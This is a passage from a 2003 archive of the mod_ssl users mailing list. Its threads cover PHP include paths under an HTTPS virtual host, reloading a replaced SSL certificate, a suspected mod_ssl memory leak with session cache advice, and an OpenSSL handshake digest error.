.......... Steve





------_=_NextPart_001_01C3C34D.03F13686--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 16 11:30:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3C4E0A8973; Tue, 16 Dec 2003 11:30:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 5BEA3A893B
	for ; Tue, 16 Dec 2003 11:30:33 +0100 (CET)
Received: from Maggotts2.rnib.org.uk (maggotts2.rnib.org.uk [194.128.16.193])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id hBGAUEV28875
	for ; Tue, 16 Dec 2003 10:30:20 GMT
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F05ADDA21@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Cannot Access Includes Above Current Directory
Date: Tue, 16 Dec 2003 10:30:03 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This isn't really a mod_ssl issue, but I suggest you use the absolute path
for included php as the current directory is probably where the httpd binary
is, or perhaps where the config files are.

(I changed the subject as my last post was rejected, somehow)

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

There is more historical evidence for the existence of Jesus Christ than for
either Henry VIII or Julius Caesar.

- 
DISCLAIMER: 

NOTICE: The information contained in this email and any attachments is 
confidential and may be privileged. If you are not the intended 
recipient you should not use, disclose, distribute or copy any of the 
content of it or of any attachment; you are requested to notify the 
sender immediately of your receipt of the email and then to delete it 
and any attachments from your system. 

RNIB endeavours to ensure that emails and any attachments generated by 
its staff are free from viruses or other contaminants. However, it 
cannot accept any responsibility for any  such which are transmitted.
We therefore recommend you scan all attachments. 

Please note that the statements and views expressed in this email and 
any attachments are those of the author and do not necessarily represent 
those of RNIB. 

RNIB Registered Charity Number: 226227 

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 16 18:29:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 61B27A8973; Tue, 16 Dec 2003 18:29:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from email.sdfair.com (email.sdfair.com [209.132.87.9])
	by master.modssl.org (Postfix) with ESMTP id EF646A893B
	for ; Tue, 16 Dec 2003 18:29:24 +0100 (CET)
Received: from email.sdfair.com (Not Verified[127.0.0.1]) by email.sdfair.com with NetIQ MailMarshal (v5.5.4.16)
	id ; Tue, 16 Dec 2003 09:29:20 -0800
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Cannot Access Includes Above Current Directory
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Tue, 16 Dec 2003 09:29:20 -0800
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Cannot Access Includes Above Current Directory
Thread-Index: AcPDv8Hgs3gs1FYlQV+BqlW5JA5mewAM2d+Q
From: "Steve Benson" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Steve Benson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

John:

Thanks for taking the time to respond to my question it's much
appreciated.

I can understand this may be thought of as nothing to do with mod_ssl
(and that's most likely true).  I'm not sure what other list might be
more appropriate and was trying to reach knowledgeable folks with both
Apache and SSL experience.

It might help if I explained the reason I tried the mod_ssl list is that
-

- I've created a number of Apache web sites using PHP but this is my
first using SSL(mod_ssl incorporated into Apache 2.0.48, openssl). I've
never encountered anything like this before in web development.

- All scripts work fine with relative paths to include files as long as
they're accessed via http and are not in the
https virtual server directory tree structure.

- When accessing the same scripts within the https virtual server tree
the scripts cannot reference any include files that
aren't at the same level or below in the directory tree.

- If the include file is made available at the same level or below, no
problem accessing via relative or absolute paths.

- Even when the paths to include files are changed to absolute paths
they fail if the file is above the current directory in the tree.  For
some reason I can't go up the directory tree from within the https
virtual server directory structure.
This is true no matter where I am in the structure i.e. if I'm two
levels deep in the directory tree I can't reference a file up one level.
If I'm three levels deep I can't reference files back on level two,
bummer!

This seems to be a configuration problem but I've exhausted my resources
trying to figure out what within httpd.conf or ssl.conf would be causing
this behavior.

Seems like such a small thing but with an existing site structure I'd
have to replicate many scripts, css',images etc. to make the components
I need available within the https virtual server's directory structure.
What a maintenance nightmare!

Any suggestions you may offer are appreciated.

Thanks,

.......... Steve



-----Original Message-----
From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]=20
Sent: Tuesday, December 16, 2003 2:30 AM
To: modssl-users@modssl.org
Subject: RE: Cannot Access Includes Above Current Directory


This isn't really a mod_ssl issue, but I suggest you use the absolute
path for included php as the current directory is probably where the
httpd binary is, or perhaps where the config files are.

(I changed the subject as my last post was rejected, somehow)

-=20
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind, Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848
John.Airey@rnib.org.uk=20

There is more historical evidence for the existence of Jesus Christ than
for either Henry VIII or Julius Caesar.

-=20
DISCLAIMER:=20

NOTICE: The information contained in this email and any attachments is=20
confidential and may be privileged. If you are not the intended=20
recipient you should not use, disclose, distribute or copy any of the=20
content of it or of any attachment; you are requested to notify the=20
sender immediately of your receipt of the email and then to delete it=20
and any attachments from your system.=20

RNIB endeavours to ensure that emails and any attachments generated by=20
its staff are free from viruses or other contaminants. However, it=20
cannot accept any responsibility for any  such which are transmitted. We
therefore recommend you scan all attachments.=20

Please note that the statements and views expressed in this email and=20
any attachments are those of the author and do not necessarily represent

those of RNIB.=20

RNIB Registered Charity Number: 226227=20

Website: http://www.rnib.org.uk=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 18 11:34:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0B785A8958; Thu, 18 Dec 2003 11:34:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solutionsinc.co.uk (mail.solutionsinc.co.uk [81.98.215.247])
	by master.modssl.org (Postfix) with ESMTP id F0CFDA893B
	for ; Thu, 18 Dec 2003 11:33:43 +0100 (CET)
Received: from [80.5.91.122] (account huw.jenkins HELO [192.168.1.209])
  by solutionsinc.co.uk (CommuniGate Pro SMTP 4.0.6)
  with ESMTP id 7860507 for modssl-users@modssl.org; Thu, 18 Dec 2003 10:32:53 +0000
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Thu, 18 Dec 2003 10:32:52 +0000
Subject: Replacing an SSL certificate
From: Huw Jenkins 
To: 
Message-ID: 
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F05ADDA21@pborolocal.rnib.org.uk>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Huw Jenkins 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi there,

I've just replaced an SSL certificate (on a Mac OS 10.2 machine) and
restarted apache however it's still not recognising the new certificates
(still seeing the old one). I've not been asked for the passphrase either.
What's the command for getting apache to re read the SSL certificates?

Regards

Huw Jenkins

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 18 20:17:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6D9E9A8958; Thu, 18 Dec 2003 20:17:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 7CF0AA893B
	for ; Thu, 18 Dec 2003 20:16:51 +0100 (CET)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2003031900) with ESMTP id hBIJGiYX008401
	for ; Thu, 18 Dec 2003 14:16:45 -0500 (EST)
Date: Thu, 18 Dec 2003 14:16:44 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: modssl-users@modssl.org
Subject: Re: Replacing an SSL certificate
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 18 Dec 2003, Huw Jenkins wrote:

> I've just replaced an SSL certificate (on a Mac OS 10.2 machine) and
> restarted apache however it's still not recognising the new certificates
> (still seeing the old one). I've not been asked for the passphrase either.
> What's the command for getting apache to re read the SSL certificates?

What kind of restart did you do?  Try stopping and starting again rather
than doing a plain restart or a graceful restart.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 19 10:14:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E108AA8958; Fri, 19 Dec 2003 10:14:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dymwsm17.mailwatch.com (dymwsm17.mailwatch.com [204.253.83.165])
	by master.modssl.org (Postfix) with ESMTP id E9CE5A8936
	for ; Fri, 19 Dec 2003 10:14:41 +0100 (CET)
Received: from mwsc0227.mw4.mailwatch.com (mwsc0227.mw4.mailwatch.com [204.253.83.158])
	by dymwsm17.mailwatch.com (8.12.9/8.12.9) with ESMTP id hBJ9EWN8011842
	for ; Fri, 19 Dec 2003 04:14:32 -0500
Received: from mail pickup service by mwsc0227.mw4.mailwatch.com with Microsoft SMTPSVC;
	 Fri, 19 Dec 2003 04:14:32 -0500
Received: from 204.253.83.34 ([204.253.83.34]) by MWSC0227 with SMTP id 0002001b32892f16-73aa-4e07-8c37-ec9651f6cfeb;
	 Fri, 19 Dec 2003 04:14:32 -0500
Received: from bigbird.entegrity.com (bigbird.entegrity.com [192.92.110.50])
	by dymwsm12.mailwatch.com (8.12.9/8.12.9) with ESMTP id hBJ9EVR9006677
	for ; Fri, 19 Dec 2003 04:14:31 -0500
Received: from JOHUGHES ([192.92.110.177]) by bigbird.entegrity.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.10)
	id VDLRCW7F; Fri, 19 Dec 2003 04:09:15 -0500
From: "John Hughes" 
To: 
Subject: FW: Memory leak - Apache2.0.47 and openSSL 0.9.7c
Date: Fri, 19 Dec 2003 09:19:15 -0000
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-MW-BTID: 090325000020033533327200002
X-MW-CTIME: 1071825271
X-MW-SENDING-MTA: 192.92.110.50
HOP-COUNT: 1
X-MAILWATCH-INSTANCEID: 0102001b32892f16-73aa-4e07-8c37-ec9651f6cfeb
X-OriginalArrivalTime: 19 Dec 2003 09:14:32.0068 (UTC) FILETIME=[8345EC40:01C3C610]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John Hughes" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I've been performing some stress tests on the following environment:

- Redhat 8.0
- Apache web server 2.0.47
- openSSL 0.9.7c

the tests have involved accessing simple web pages many times using an
automated load generator.

Whilst memory utilization without mod_ssl load was seen to be flat (using
gkrellm) - as soon as I loaded mod_ssl and started to use SSL connections
memory increases and grows.

I've done tests with server authn and with client authn - there would appear
to be a memory leak in both cases.

In order to obtain more accurate memory utilization metrics due to httpd
with mod_ssl I've produced a utility that logged every minute the average
RSS over all of the httpd threads I had loaded (1074 in all).

In a period of 5 hours I had a leak of 25 Mbytes - per httpd thread


A few more details on the test:
	- 100 "virtual" clients
	- total load of about 45 trans/sec - because of a few embedded images this
results in about 70->80/sec HTTP GETs
	- each HTTP GET in general will result in a new SSL connection
	- in all about 500,000 trans where performed.


Please let me know if you would like any other information.  I do have
output from the load generator and the utility that I can send anyone.


John

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 19 10:36:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CFB5CA8975; Fri, 19 Dec 2003 10:36:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gw.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id 8B754A893D
	for ; Fri, 19 Dec 2003 10:36:36 +0100 (CET)
Received: by gw.toftum.org (Postfix, from userid 1000)
	id 9475E5E022F; Fri, 19 Dec 2003 10:37:12 +0100 (CET)
Date: Fri, 19 Dec 2003 10:37:12 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: FW: Memory leak - Apache2.0.47 and openSSL 0.9.7c
Message-ID: <20031219093712.GA15232@gw>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Dec 19, 2003 at 09:19:15AM -0000, John Hughes wrote:
> Please let me know if you would like any other information.  I do have
> output from the load generator and the utility that I can send anyone.
> 
What type of SSLSessionCache are you using? Do you any any 3rd party
modules?
Please also note that the current release version is 2.0.48

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 19 11:57:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7254CA8958; Fri, 19 Dec 2003 11:57:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dymwsm17.mailwatch.com (dymwsm17.mailwatch.com [204.253.83.165])
	by master.modssl.org (Postfix) with ESMTP id 7621AA893D
	for ; Fri, 19 Dec 2003 11:57:20 +0100 (CET)
Received: from MWSC0207.MW4.MAILWATCH.COM (mwsc0207.mw4.mailwatch.com [204.253.83.129])
	by dymwsm17.mailwatch.com (8.12.9/8.12.9) with ESMTP id hBJAvEN8000851
	for ; Fri, 19 Dec 2003 05:57:16 -0500
Received: from mail pickup service by MWSC0207.MW4.MAILWATCH.COM with Microsoft SMTPSVC;
	 Fri, 19 Dec 2003 05:57:14 -0500
Received: from 204.253.83.26 ([204.253.83.26]) by MWSC0207 with SMTP id 0002000730d97d6d-7076-41f1-85e9-238b4fa1603b;
	 Fri, 19 Dec 2003 05:57:14 -0500
Received: from bigbird.entegrity.com (bigbird.entegrity.com [192.92.110.50])
	by dymwsm11.mailwatch.com (8.12.9/8.12.9) with ESMTP id hBJAvDmp003990
	for ; Fri, 19 Dec 2003 05:57:14 -0500
Received: from JOHUGHES ([192.92.110.177]) by bigbird.entegrity.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.10)
	id VDLRCXDJ; Fri, 19 Dec 2003 05:51:57 -0500
From: "John Hughes" 
To: 
Subject: RE: FW: Memory leak - Apache2.0.47 and openSSL 0.9.7c
Date: Fri, 19 Dec 2003 11:01:57 -0000
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0)
In-Reply-To: <20031219093712.GA15232@gw>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-MW-BTID: 090225000020033533943400001
X-MW-CTIME: 1071831433
X-MW-SENDING-MTA: 192.92.110.50
HOP-COUNT: 1
X-MAILWATCH-INSTANCEID: 0102000730d97d6d-7076-41f1-85e9-238b4fa1603b
X-OriginalArrivalTime: 19 Dec 2003 10:57:14.0179 (UTC) FILETIME=[DC2D7130:01C3C61E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John Hughes" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have no 3rd party modules loaded.  The testing I did was with and without
mod_ssl loaded.  Only when mod_ssl was loaded - and SSL was used - did I see
a memory leak under load.

My SSLSessionCache values are the default and are:

SSLSessionCache		dbm:logs/ssl_scache
SSLSessionCacheTimeout	300

John

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Mads Toftum
> Sent: 19 December 2003 09:37
> To: modssl-users@modssl.org
> Subject: Re: FW: Memory leak - Apache2.0.47 and openSSL 0.9.7c
>
>
> On Fri, Dec 19, 2003 at 09:19:15AM -0000, John Hughes wrote:
> > Please let me know if you would like any other information.  I do have
> > output from the load generator and the utility that I can send anyone.
> >
> What type of SSLSessionCache are you using? Do you any any 3rd party
> modules?
> Please also note that the current release version is 2.0.48
>
> vh
>
> Mads Toftum
> --
> `Darn it, who spiked my coffee with water?!' - lwall
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 19 13:58:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 24B10A8958; Fri, 19 Dec 2003 13:58:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gw.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id BEE5BA8936
	for ; Fri, 19 Dec 2003 13:57:46 +0100 (CET)
Received: by gw.toftum.org (Postfix, from userid 1000)
	id D2FF65E01CA; Fri, 19 Dec 2003 13:58:32 +0100 (CET)
Date: Fri, 19 Dec 2003 13:58:32 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: FW: Memory leak - Apache2.0.47 and openSSL 0.9.7c
Message-ID: <20031219125832.GA21483@gw>
Mail-Followup-To: modssl-users@modssl.org
References: <20031219093712.GA15232@gw> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Dec 19, 2003 at 11:01:57AM -0000, John Hughes wrote:
> I have no 3rd party modules loaded.  The testing I did was with and without
> mod_ssl loaded.  Only when mod_ssl was loaded - and SSL was used - did I see
> a memory leak under load.
> 
> My SSLSessionCache values are the default and are:
> 
> SSLSessionCache		dbm:logs/ssl_scache
> SSLSessionCacheTimeout	300
> 
On linux you really should be using a shared memory session cache - like
SSLSessionCache shmcb:logs/ssl_gcache_data(512000)
SSLSessionCacheTimeout        300


vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 19 17:52:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2E71CA8958; Fri, 19 Dec 2003 17:52:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solutionsinc.co.uk (mail.solutionsinc.co.uk [81.98.215.247])
	by master.modssl.org (Postfix) with ESMTP id 665CBA8936
	for ; Fri, 19 Dec 2003 17:52:16 +0100 (CET)
Received: from [80.5.91.122] (account huw.jenkins HELO [192.168.1.209])
  by solutionsinc.co.uk (CommuniGate Pro SMTP 4.0.6)
  with ESMTP id 7887019 for modssl-users@modssl.org; Fri, 19 Dec 2003 16:52:02 +0000
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Fri, 19 Dec 2003 16:52:01 +0000
Subject: Re: Replacing an SSL certificate
From: Huw Jenkins 
To: 
Message-ID: 
In-Reply-To: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Huw Jenkins 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I rebooted the unit eventually, which I guess had the same effect. However I
will remember that in future.

Many thanks.

Huw Jenkins

> From: Cliff Woolley 
> Reply-To: modssl-users@modssl.org
> Date: Thu, 18 Dec 2003 14:16:44 -0500 (EST)
> To: modssl-users@modssl.org
> Subject: Re: Replacing an SSL certificate
> 
> On Thu, 18 Dec 2003, Huw Jenkins wrote:
> 
>> I've just replaced an SSL certificate (on a Mac OS 10.2 machine) and
>> restarted apache however it's still not recognising the new certificates
>> (still seeing the old one). I've not been asked for the passphrase either.
>> What's the command for getting apache to re read the SSL certificates?
> 
> What kind of restart did you do?  Try stopping and starting again rather
> than doing a plain restart or a graceful restart.
> 
> --Cliff
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 19 21:51:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C3D09A8958; Fri, 19 Dec 2003 21:51:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from flarn.com (flarn.com [216.126.84.58])
	by master.modssl.org (Postfix) with ESMTP id 5C6ACA8936
	for ; Fri, 19 Dec 2003 21:51:29 +0100 (CET)
Received: from flarn.com (h120-129-61.datawire.net [207.61.129.120])
	(authenticated bits=0)
	by flarn.com (8.12.8/8.12.8) with ESMTP id hBJKpPKc030954
	for ; Fri, 19 Dec 2003 15:51:25 -0500
Message-ID: <3FE364CC.6090309@flarn.com>
Date: Fri, 19 Dec 2003 15:51:24 -0500
From: Ken Snider 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031016
X-Accept-Language: en-ca, en-gb, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL_R_DIGEST_CHECK_FAILED
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Snider 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We have a 0.9.6-based client talking to a 0.9.7a-based mod_ssl server.

Communication is fine for initial session negotiation, and for SSL session 
resumption while the key remains in the cache. However, if the key has expired 
and we try to pass a new SSL Session ID to the client, the client response is 
rejected by the server.

The error the client is receiving is a handshake error 40 (0x28). The error
description generated in the Apache error log is:
Library Error: 336117909 error:1408C095:lib(20):func(140):reason(149)
lib 20: SSL Library
func 140: EC_F_EC_GROUP_GET_FINISHED
reason 149: SSL_R_DIGEST_CHECK_FAILED

..and is generated after the server receives the client response to the
ServerHello with certificate. The client response consists of a:
- ClientKeyExchange
- ChangeCipherSpec
- EncryptedHandshake

For this packet in question.

This does *not* happen against a 0.9.6-based mod_ssl of the same version of 
Apache.

Has anyone seen this specific error before in an implementation? 
(SSL_R_DIGEST_CHECK_FAILED)?

Any information would be appreciated. We're frankly scratching our heads as to 
where this problem is coming from.

-- 
Ken Snider

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 19 21:55:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 24632A8958; Fri, 19 Dec 2003 21:55:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from flarn.com (flarn.com [216.126.84.58])
	by master.modssl.org (Postfix) with ESMTP id 98A25A8936
	for ; Fri, 19 Dec 2003 21:54:59 +0100 (CET)
Received: from flarn.com (h120-129-61.datawire.net [207.61.129.120])
	(authenticated bits=0)
	by flarn.com (8.12.8/8.12.8) with ESMTP id hBJKstKc031020
	for ; Fri, 19 Dec 2003 15:54:55 -0500
Message-ID: <3FE3659F.40205@flarn.com>
Date: Fri, 19 Dec 2003 15:54:55 -0500
From: Ken Snider 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031016
X-Accept-Language: en-ca, en-gb, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Suggest SSLSessionCacheTimeout and Cache sizes?
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Snider 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Does anyone have any information on shmcb cache sizings? Specifically, how 
many bytes per request are taken up in shm for each cache entry? I'd like to 
make sure my shm size is sufficient for the Cache Timeouts I want to use.

Secondly, is there any reason why the SSLSessionCacheTimeout can't be 
arbitrarily large (say, an hour)? And at what size (or number of entries) does 
the cache size begin to seriously hamper lookups within the cache itself?

Thanks for any assistance with the above.

-- 
Ken Snider

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Dec 20 03:49:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 93E72A8948; Sat, 20 Dec 2003 03:49:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cyrus.vandervecken.com (cyrus.vandervecken.com [64.124.43.248])
	by master.modssl.org (Postfix) with ESMTP id 7BFDCA8939
	for ; Sat, 20 Dec 2003 03:49:37 +0100 (CET)
